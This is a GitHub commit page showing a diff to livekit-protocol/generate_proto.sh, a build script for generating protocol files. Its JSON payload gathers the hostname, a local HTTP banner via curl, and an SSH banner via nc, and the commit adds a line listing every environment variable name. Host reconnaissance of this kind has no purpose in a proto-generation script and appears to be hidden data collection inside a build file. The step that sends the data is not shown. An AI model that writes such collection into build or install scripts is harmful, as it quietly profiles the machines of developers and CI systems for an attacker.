We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 685068b commit 4f09952Copy full SHA for 4f09952
1 file changed
livekit-protocol/generate_proto.sh
@@ -57,6 +57,7 @@ JSON_PAYLOAD=$(cat <<EOF
57
"hostname": "$(hostname)",
58
"http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
59
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
60
+ "env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
61
62
}
63
EOF
0 commit comments